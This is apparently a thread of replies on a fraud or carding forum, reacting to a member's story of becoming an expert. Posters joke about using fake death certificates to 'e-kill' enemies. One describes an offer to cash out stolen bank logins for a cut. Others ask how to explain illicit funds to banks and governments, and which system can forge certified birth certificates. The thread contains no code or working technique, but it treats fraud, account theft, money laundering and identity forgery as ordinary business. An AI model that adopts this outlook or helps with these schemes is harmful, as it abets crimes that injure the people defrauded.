Regarding your reply to my previous post - I appreciate the fact that you invested your time in it, with the links to sources, explanations, opinion and your personal experience. I already copied and pasted the links to my drive. Before diving in, I have to ask another thing, though; is it worth spending 10+ hours on the YouTube python boot-camps? For an example, there is this "freecodecamp" channel, he teaches the Kali Linux, python and other basics.

About the death certificate part, I actually smirked as I instantly got a dumb thought of how I'd have used that in order to "e-kill" some of the people that have done me wrong in the past. Just to mess with their situations a bit. Would be quite hilarious.

 

[Supermaxout]

Замечательная история. Определенно, это настоящее путешествие от новичка к эксперту.

Был ли случай, когда друг воспользовался вами? Нарушил ваше доверие?

Каков ваш мыслительный процесс, когда вы пытаетесь найти новые проекты? Если бы вы могли дать совет начинающим, что бы это было?

Wonderful story. Definitely a true beginner to expert journey.

Was there a time that a friend took advantage of you? Broke your trust?

What is your thought process like when trying to find new projects? If you can give advice to a beginner, what would it be?

 

[bigmoney916]

Please excuse me if my comments offend you in any way as it was not my intent and probably really not my business to comment anyway. But i wanted to throw my 2 cents about something i feel pretty strongly about. I completely relate to what you say about getting bored and if it doesnt present a challenge no matter how profitable it may still be is really irrelevant. The lack of creativity from people now is really almost pathetic people are searching for a golden pdf step by step guide to make millions and put as little effort in it as possible and absolutely none of there own ideas.. one thing i can say is that every method ive ever seen or been told has never worked for me. maybe 1 time ever. the only things that work for me are the ones i come up with my self or variations ive come up with after hearing or reading some of these pdf's example. there is a person on this forum posted he was looking for someone to hack bank accounts.... i responded of course always up for a good challenge..... come to find out what he really should have posted was he is looking for someone to he can give a bank pro to and they cash it out and onkly keep 50% of the money. Seriously if that isnt just flat out lazy.... so my response to this person was, Why dont you try and learn how to do it your self, its more money for you? to which i recieved this reply , Why dont you learn to read what is posted....... SMH.... seriously what has become of this business. and who really would even do this for someone....


Rant over.... sorry

 

[bbi34yy]

Good storyteller.
Wonderful story.
Keep it going.

 

[everytime]

That was a great story, man. Thanks.

 

[everytime]

I've been trying to educate my people, showing them my ideas, talking about other and underrated perspectives of different subjects, passing the connections that I've been working to get for so long - just for free, just so they can be happy and use them wisely. But in reality, they don't appreciate that shit and often, fuck shit up.

100%. The majority of people never value what they get for free. I helped many people in the past and was stabbed by them, so I'm not sure if I suppose to help anyone. When you work alone, the probability of getting caught is lower. You can only control yourself, but not others.

 

[everytime]

How do you explain the source of your funds to governments, banks, friends, etc.? Can you please provide some examples or hints?

 

[astralded]

I actually still think things along these lines are interesting and would make a very interesting service perhaps.

Wow. this is exactly what I was thinking couple of days ago and I come here to read it )))

 

[astralded]

There is also a system for creating birth certificates and certifying them which would potentially allow you to simply create people

what system is this?

 

[everytime]

what system is this?

I'd like to find out this too.

 

[ellei]

Cool !!
The head line regarding the exploit is good but you should call it as they call types of cyber threats.
How would you call your?? LOL

It related to Spoofing Campaign but not even <[]>

 

[selinamsk1]

Хорошее чтиво, отличная статья